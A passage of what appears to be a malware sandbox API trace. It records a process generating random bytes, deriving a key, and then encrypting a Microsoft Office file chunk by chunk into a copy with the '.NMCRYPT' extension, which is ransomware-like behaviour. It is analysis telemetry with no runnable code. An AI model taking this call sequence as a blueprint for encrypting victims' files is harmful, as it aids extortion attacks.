pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.463] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.465] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0170.466] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7f00c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7f00c*=0x100) returned 1 [0170.466] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7f00c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7f00c*=0x100) returned 1 [0170.467] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44486c | out: phHash=0x1d44486c) returned 1 [0170.467] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7f090, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.467] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444870 | out: phKey=0x1d444870*=0x9ad8b8) returned 1 [0170.467] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7f190, dwFlags=0x0) returned 1 [0170.467] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7f040*=0x1, dwFlags=0x0) returned 1 [0170.467] wcslen (_String="\\\\?\\") returned 0x4 [0170.467] CryptDuplicateKey (in: hKey=0x9ad8b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7f014 | out: phKey=0x2d7f014*=0x9ad3b8) returned 1 [0170.467] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\AppXManifest.xml.NMCRYPT" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0170.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0170.469] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7f004 | out: lpFileSize=0x2d7f004*=6032416) returned 1 [0170.469] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7effc*=0x200, lpOverlapped=0x0) returned 1 [0170.470] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.470] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.470] GetLastError () returned 0x0 [0170.470] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.489] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.490] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.490] GetLastError () returned 0x0 [0170.490] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.490] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.490] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.490] GetLastError () returned 0x0 [0170.490] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.490] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.490] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.490] GetLastError () returned 0x0 [0170.490] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.490] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.491] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.491] GetLastError () returned 0x0 [0170.491] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.491] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.491] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.491] GetLastError () returned 0x0 [0170.491] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.491] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.491] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.491] GetLastError () returned 0x0 [0170.491] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.491] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.491] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.491] GetLastError () returned 0x0 [0170.491] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.491] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.491] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.492] GetLastError () returned 0x0 [0170.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.492] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.492] GetLastError () returned 0x0 [0170.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.492] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.492] GetLastError () returned 0x0 [0170.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.492] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.492] GetLastError () returned 0x0 [0170.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.492] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.492] GetLastError () returned 0x0 [0170.492] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.492] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.493] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.493] GetLastError () returned 0x0 [0170.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.493] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.493] GetLastError () returned 0x0 [0170.493] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.493] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.493] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) 